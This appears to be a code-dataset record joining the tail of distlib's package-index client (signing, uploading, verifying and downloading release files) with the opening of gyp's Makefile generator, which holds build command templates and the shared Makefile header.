cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protcol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
if self.rpc_proxy is None:
self.rpc_proxy = ServerProxy(self.url, timeout=3.0)
return self.rpc_proxy.search(terms, operator or 'and')
| mit |
zwahf1/Thesis | GlucoMan/node_modules/node-gyp/gyp/pylib/gyp/generator/make.py | 896 | 91092 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Notes:
#
# This is all roughly based on the Makefile system used by the Linux
# kernel, but is a non-recursive make -- we put the entire dependency
# graph in front of make and let it figure it out.
#
# The code below generates a separate .mk file for each target, but
# all are sourced by the top-level Makefile. This means that all
# variables in .mk-files clobber one another. Be careful to use :=
# where appropriate for immediate evaluation, and similarly to watch
# that you're not relying on a variable value to last beween different
# .mk files.
#
# TODOs:
#
# Global settings and utility functions are currently stuffed in the
# toplevel Makefile. It may make sense to generate some .mk files on
# the side to keep the the files readable.
import os
import re
import sys
import subprocess
import gyp
import gyp.common
import gyp.xcode_emulation
from gyp.common import GetEnvironFallback
from gyp.common import GypError
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'SHARED_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'INTERMEDIATE_DIR': '$(obj).$(TOOLSET)/$(TARGET)/geni',
'SHARED_INTERMEDIATE_DIR': '$(obj)/gen',
'PRODUCT_DIR': '$(builddir)',
'RULE_INPUT_ROOT': '%(INPUT_ROOT)s', # This gets expanded by Python.
'RULE_INPUT_DIRNAME': '%(INPUT_DIRNAME)s', # This gets expanded by Python.
'RULE_INPUT_PATH': '$(abspath $<)',
'RULE_INPUT_EXT': '$(suffix $<)',
'RULE_INPUT_NAME': '$(notdir $<)',
'CONFIGURATION_NAME': '$(BUILDTYPE)',
}
# Make supports multiple toolsets
generator_supports_multiple_toolsets = True
# Request sorted dependencies in the order from dependents to dependencies.
generator_wants_sorted_dependencies = False
# Placates pylint.
generator_additional_non_configuration_keys = []
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
generator_filelist_paths = None
def CalculateVariables(default_variables, params):
"""Calculate additional variables for use in the build (called by gyp)."""
flavor = gyp.common.GetFlavor(params)
if flavor == 'mac':
default_variables.setdefault('OS', 'mac')
default_variables.setdefault('SHARED_LIB_SUFFIX', '.dylib')
default_variables.setdefault('SHARED_LIB_DIR',
generator_default_variables['PRODUCT_DIR'])
default_variables.setdefault('LIB_DIR',
generator_default_variables['PRODUCT_DIR'])
# Copy additional generator configuration data from Xcode, which is shared
# by the Mac Make generator.
import gyp.generator.xcode as xcode_generator
global generator_additional_non_configuration_keys
generator_additional_non_configuration_keys = getattr(xcode_generator,
'generator_additional_non_configuration_keys', [])
global generator_additional_path_sections
generator_additional_path_sections = getattr(xcode_generator,
'generator_additional_path_sections', [])
global generator_extra_sources_for_rules
generator_extra_sources_for_rules = getattr(xcode_generator,
'generator_extra_sources_for_rules', [])
COMPILABLE_EXTENSIONS.update({'.m': 'objc', '.mm' : 'objcxx'})
else:
operating_system = flavor
if flavor == 'android':
operating_system = 'linux' # Keep this legacy behavior for now.
default_variables.setdefault('OS', operating_system)
default_variables.setdefault('SHARED_LIB_SUFFIX', '.so')
default_variables.setdefault('SHARED_LIB_DIR','$(builddir)/lib.$(TOOLSET)')
default_variables.setdefault('LIB_DIR', '$(obj).$(TOOLSET)')
def CalculateGeneratorInputInfo(params):
"""Calculate the generator specific info that gets fed to input (called by
gyp)."""
generator_flags = params.get('generator_flags', {})
android_ndk_version = generator_flags.get('android_ndk_version', None)
# Android NDK requires a strict link order.
if android_ndk_version:
global generator_wants_sorted_dependencies
generator_wants_sorted_dependencies = True
output_dir = params['options'].generator_output or \
params['options'].toplevel_dir
builddir_name = generator_flags.get('output_dir', 'out')
qualified_out_dir = os.path.normpath(os.path.join(
output_dir, builddir_name, 'gypfiles'))
global generator_filelist_paths
generator_filelist_paths = {
'toplevel': params['options'].toplevel_dir,
'qualified_out_dir': qualified_out_dir,
}
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
LINK_COMMANDS_LINUX = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crsT $@ $(filter %.o,$^)
# Due to circular dependencies between libraries :(, we wrap the
# special "figure out circular dependencies" flags around the entire
# input list during linking.
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
# We support two kinds of shared objects (.so):
# 1) shared_library, which is just bundling together many dependent libraries
# into a link line.
# 2) loadable_module, which is generating a module intended for dlopen().
#
# They differ only slightly:
# In the former case, we want to package all dependent code into the .so.
# In the latter case, we want to package just the API exposed by the
# outermost module.
# This means shared_library uses --whole-archive, while loadable_module doesn't.
# (Note that --whole-archive is incompatible with the --start-group used in
# normal linking.)
# Other shared-object link notes:
# - Set SONAME to the library filename so our binaries don't reference
# the local, absolute paths used on the link command-line.
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
"""
LINK_COMMANDS_MAC = """\
quiet_cmd_alink = LIBTOOL-STATIC $@
cmd_alink = rm -f $@ && ./gyp-mac-tool filter-libtool libtool $(GYP_LIBTOOLFLAGS) -static -o $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o "$@" $(LD_INPUTS) $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -bundle $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
LINK_COMMANDS_ANDROID = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) crsT $@ $(filter %.o,$^)
# Due to circular dependencies between libraries :(, we wrap the
# special "figure out circular dependencies" flags around the entire
# input list during linking.
quiet_cmd_link = LINK($(TOOLSET)) $@
quiet_cmd_link_host = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ -Wl,--start-group $(LD_INPUTS) -Wl,--end-group $(LIBS)
cmd_link_host = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
# Other shared-object link notes:
# - Set SONAME to the library filename so our binaries don't reference
# the local, absolute paths used on the link command-line.
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--whole-archive $(LD_INPUTS) -Wl,--no-whole-archive $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ -Wl,--start-group $(filter-out FORCE_DO_CMD, $^) -Wl,--end-group $(LIBS)
quiet_cmd_solink_module_host = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module_host = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -Wl,-soname=$(@F) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
LINK_COMMANDS_AIX = """\
quiet_cmd_alink = AR($(TOOLSET)) $@
cmd_alink = rm -f $@ && $(AR.$(TOOLSET)) -X32_64 crs $@ $(filter %.o,$^)
quiet_cmd_alink_thin = AR($(TOOLSET)) $@
cmd_alink_thin = rm -f $@ && $(AR.$(TOOLSET)) -X32_64 crs $@ $(filter %.o,$^)
quiet_cmd_link = LINK($(TOOLSET)) $@
cmd_link = $(LINK.$(TOOLSET)) $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
quiet_cmd_solink = SOLINK($(TOOLSET)) $@
cmd_solink = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(LD_INPUTS) $(LIBS)
quiet_cmd_solink_module = SOLINK_MODULE($(TOOLSET)) $@
cmd_solink_module = $(LINK.$(TOOLSET)) -shared $(GYP_LDFLAGS) $(LDFLAGS.$(TOOLSET)) -o $@ $(filter-out FORCE_DO_CMD, $^) $(LIBS)
"""
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
SHARED_HEADER = ("""\
# We borrow heavily from the kernel build setup, though we are simpler since
# we don't have Kconfig tweaking settings on us.
# The implicit make rules have it looking for RCS files, among other things.
# We instead explicitly write all the rules we care about.
# It's even quicker (saves ~200ms) to pass -r on the command line.
MAKEFLAGS=-r
# The source directory tree.
srcdir := %(srcdir)s
abs_srcdir := $(abspath $(srcdir))
# The name of the builddir.
builddir_name ?= %(builddir)s
# The V=1 flag on command line makes us verbosely print command lines.
ifdef V
quiet=
else
quiet=quiet_
endif
# Specify BUILDTYPE=Release on the command line for a release build.
BUILDTYPE ?= %(default_configuration)s
# Directory all our build output goes into.
# Note that this must be two directories beneath src/ for unit tests to pass,
# as they reach into the src/ directory for data with relative paths.
builddir ?= $(builddir_name)/$(BUILDTYPE)
abs_builddir := $(abspath $(builddir))
depsdir := $(builddir)/.deps
# Object output directory.
obj := $(builddir)/obj
abs_obj := $(abspath $(obj))
# We build up a list of every single one of the targets so we can slurp in the
# generated dependency rule Makefiles in one pass.
all_deps :=
%(make_global_settings)s
CC.target ?= %(CC.target)s
CFLAGS.target ?= $(CPPFLAGS) $(CFLAGS)
CXX.target ?= %(CXX.target)s
CXXFLAGS.target ?= $(CPPFLAGS) $(CXXFLAGS)
LINK.target ?= %(LINK.target)s
LDFLAGS.target ?= $(LDFLAGS)
AR.target ?= $(AR)
# C++ apps need to be linked with g++.
LINK ?= $(CXX.target)
# TODO(evan): move all cross-compilation logic to gyp-time so we don't need
# to replicate this environment fallback in make as well.
CC.host ?= %(CC.host)s
CFLAGS.host ?= $(CPPFLAGS_host) $(CFLAGS_host)
CXX.host ?= %(CXX.host)s
CXXFLAGS.host ?= $(CPPFLAGS_host) $(CXXFLAGS_host)
LINK.host ?= %(LINK.host)s
LDFLAGS.host ?=
AR.host ?= %(AR.host)s
# Define a dir function that can handle spaces.
# http://www.gnu.org/software/make/manual/make.html#Syntax-of-Functions
# "leading spaces cannot appear in the text of the first argument as written.
# These characters can be put into the argument value by variable substitution."
empty :=
space := $(empty) $(empty)
# http://stackoverflow.com/questions/1189781/using-make-dir-or-notdir-on-a-path-with-spaces
replace_spaces = $(subst $(space),""" + SPACE_REPLACEMENT + """,$1)
unreplace_spaces = $(subst """ + SPACE_REPLACEMENT + """,$(space),$1)
dirx = $(call unreplace_spaces,$(dir $(call replace_spaces,$1)))
# Flags to make gcc output dependency info. Note that you need to be
# careful here to use the flags that ccache and distcc can understand.
# We write to a dep file on the side first and then rename at the end
# so we can't end up with a broken dep file.
depfile = $(depsdir)/$(call replace_spaces,$@).d
DEPFLAGS = -MMD -MF $(depfile).raw
# We have to fixup the deps output in a few ways.
# (1) the file output should mention the proper .o file.
# ccache or distcc lose the path to the target, so we convert a rule of
# the form:
# foobar.o: DEP1 DEP2
# into
# path/to/foobar.o: DEP1 DEP2
# (2) we want missing files not to cause us to fail to build.
# We want to rewrite
# foobar.o: DEP1 DEP2 \\
# DEP3
# to
# DEP1:
# DEP2:
# DEP3:
# so if the files are missing, they're just considered phony rules.
# We have to do some pretty insane escaping to get those backslashes
# and dollar signs past make, the shell, and sed at the same time.
# Doesn't work with spaces, but that's fine: .d files have spaces in
# their names replaced with other characters."""
r"""
define fixup_dep
# The depfile may not exist if the input file didn't have any #includes.
touch $(depfile).raw
# Fixup path as in (1).
sed -e "s|^$(notdir $@)|$@|" $(depfile).raw >> $(depfile)
# Add extra rules as in (2).
# We remove slashes and replace spaces with new lines;
# remove blank lines;
# delete the first line and append a colon to the remaining lines.
sed -e 's|\\||' -e 'y| |\n|' $(depfile).raw |\
grep -v '^$$' |\
sed -e 1d -e 's|$$|:|' \
>> $(depfile)
rm $(depfile).raw
endef
"""
"""
# Command definitions:
# - cmd_foo is the actual command to run;
# - quiet_cmd_foo is the brief-output summary of the command.
quiet_cmd_cc = CC($(TOOLSET)) $@
cmd_cc = $(CC.$(TOOLSET)) $(GYP_CFLAGS) $(DEPFLAGS) $(CFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_cxx = CXX($(TOOLSET)) $@
cmd_cxx = $(CXX.$(TOOLSET)) $(GYP_CXXFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
%(extra_commands)s
quiet_cmd_touch = TOUCH $@
cmd_touch = touch $@
quiet_cmd_copy = COPY $@
# send stderr to /dev/null to ignore messages when linking directories.
cmd_copy = rm -rf "$@" && cp %(copy_archive_args)s "$<" "$@"
%(link_commands)s
"""
r"""
# Define an escape_quotes function to escape single quotes.
# This allows us to handle quotes properly as long as we always use
# use single quotes and escape_quotes.
escape_quotes = $(subst ','\'',$(1))
# This comment is here just to include a ' to unconfuse syntax highlighting.
# Define an escape_vars function to escape '$' variable syntax.
# This allows us to read/write command lines with shell variables (e.g.
# $LD_LIBRARY_PATH), without triggering make substitution.
escape_vars = $(subst $$,$$$$,$(1))
# Helper that expands to a shell command to echo a string exactly as it is in
# make. This uses printf instead of echo because printf's behaviour with respect
# to escape sequences is more portable than echo's across different shells
# (e.g., dash, bash).
exact_echo = printf '%%s\n' '$(call escape_quotes,$(1))'
"""
"""
# Helper to compare the command we're about to run against the command
# we logged the last time we ran the command. Produces an empty
# string (false) when the commands match.
# Tricky point: Make has no string-equality test function.
# The kernel uses the following, but it seems like it would have false
# positives, where one string reordered its arguments.
# arg_check = $(strip $(filter-out $(cmd_$(1)), $(cmd_$@)) \\
# $(filter-out $(cmd_$@), $(cmd_$(1))))
# We instead substitute each for the empty string into the other, and
# say they're equal if both substitutions produce the empty string.
# .d files contain """ + SPACE_REPLACEMENT + \
""" instead of spaces, take that into account.
command_changed = $(or $(subst $(cmd_$(1)),,$(cmd_$(call replace_spaces,$@))),\\
$(subst $(cmd_$(call replace_spaces,$@)),,$(cmd_$(1))))
# Helper that is non-empty when a prerequisite changes.
# Normally make does this implicitly, but we force rules to always run
# so we can check their command lines.
# $? -- new prerequisites
# $| -- order-only dependencies
prereq_changed = $(filter-out FORCE_DO_CMD,$(filter-out $|,$?))
# Helper that executes all postbuilds until one fails.
define do_postbuilds
@E=0;\\
for p in $(POSTBUILDS); do\\
eval $$p;\\
E=$$?;\\
if [ $$E -ne 0 ]; then\\
break;\\
fi;\\
done;\\
if [ $$E -ne 0 ]; then\\
rm -rf "$@";\\
exit $$E;\\
fi
endef
# do_cmd: run a command via the above cmd_foo names, if necessary.
# Should always run for a given target to handle command-line changes.
# Second argument, if non-zero, makes it do asm/C/C++ dependency munging.
# Third argument, if non-zero, makes it do POSTBUILDS processing.
# Note: We intentionally do NOT call dirx for depfile, since it contains """ + \
SPACE_REPLACEMENT + """ for
# spaces already and dirx strips the """ + SPACE_REPLACEMENT + \
""" characters.
define do_cmd
$(if $(or $(command_changed),$(prereq_changed)),
@$(call exact_echo, $($(quiet)cmd_$(1)))
@mkdir -p "$(call dirx,$@)" "$(dir $(depfile))"
$(if $(findstring flock,$(word %(flock_index)d,$(cmd_$1))),
@$(cmd_$(1))
@echo " $(quiet_cmd_$(1)): Finished",
@$(cmd_$(1))
)
@$(call exact_echo,$(call escape_vars,cmd_$(call replace_spaces,$@) := $(cmd_$(1)))) > $(depfile)
@$(if $(2),$(fixup_dep))
$(if $(and $(3), $(POSTBUILDS)),
$(call do_postbuilds)
)
)
endef
# Declare the "%(default_target)s" target first so it is the default,
# even though we don't have the deps yet.
.PHONY: %(default_target)s
%(default_target)s:
# make looks for ways to re-generate included makefiles, but in our case, we
# don't have a direct way. Explicitly telling make that it has nothing to do
# for them makes it go faster.
%%.d: ;
# Use FORCE_DO_CMD to force a target to run. Should be coupled with
# do_cmd.
.PHONY: FORCE_DO_CMD
FORCE_DO_CMD:
""")
SHARED_HEADER_MAC_COMMANDS = """
quiet_cmd_objc = CXX($(TOOLSET)) $@
cmd_objc = $(CC.$(TOOLSET)) $(GYP_OBJCFLAGS) $(DEPFLAGS) -c -o $@ $<
quiet_cmd_objcxx = CXX($(TOOLSET)) $@
cmd_objcxx = $(CXX.$(TOOLSET)) $(GYP_OBJCXXFLAGS) $(DEPFLAGS) -c -o $@ $<
# Commands for precompiled header files.
quiet_cmd_pch_c = CXX($(TOOLSET)) $@
cmd_pch_c = $(CC.$(TOOLSET)) $(GYP_PCH_CFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_pch_cc = CXX($(TOOLSET)) $@
cmd_pch_cc = $(CC.$(TOOLSET)) $(GYP_PCH_CXXFLAGS) $(DEPFLAGS) $(CXXFLAGS.$(TOOLSET)) -c -o $@ $<
quiet_cmd_pch_m = CXX($(TOOLSET)) $@
cmd_pch_m = $(CC.$(TOOLSET)) $(GYP_PCH_OBJCFLAGS) $(DEPFLAGS) -c -o $@ $<
quiet_cmd_pch_mm = CXX($(TOOLSET)) $@
cmd_pch_mm = $(CC.$(TOOLSET)) $(GYP_PCH_OBJCXXFLAGS) $(DEPFLAGS) -c -o $@ $<
# gyp-mac-tool is written next to the root Makefile by gyp.
# Use $(4) for the command, since $(2) and $(3) are used as flag by do_cmd
# already.
quiet_cmd_mac_tool = MACTOOL $(4) $<
cmd_mac_tool = ./gyp-mac-tool $(4) $< "$@"
quiet_cmd_mac_package_framework = PACKAGE FRAMEWORK $@
cmd_mac_package_framework = ./gyp-mac-tool package-framework "$@" $(4)
quiet_cmd_infoplist = INFOPLIST $@
cmd_infoplist = $(CC.$(TOOLSET)) -E -P -Wno-trigraphs -x c $(INFOPLIST_DEFINES) "$<" -o "$@"
"""
def WriteRootHeaderSuffixRules(writer):
extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)
writer.write('# Suffix rules, putting all outputs into $(obj).\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n# Try building from generated source, too.\n')
for ext in extensions:
writer.write(
'$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
SHARED_FOOTER = """\
# "all" is a concatenation of the "all" targets from all the included
# sub-makefiles. This is just here to clarify.
all:
# Add in dependency-tracking rules. $(all_deps) is the list of every single
# target in our tree. Only consider the ones with .d (dependency) info:
d_files := $(wildcard $(foreach f,$(all_deps),$(depsdir)/$(f).d))
ifneq ($(d_files),)
include $(d_files)
endif
"""
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
'.c': 'cc',
'.cc': 'cxx',
'.cpp': 'cxx',
'.cxx': 'cxx',
'.s': 'cc',
'.S': 'cc',
}
def Compilable(filename):
"""Return true if the file is compilable (should be in OBJS)."""
for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS):
if res:
return True
return False
def Linkable(filename):
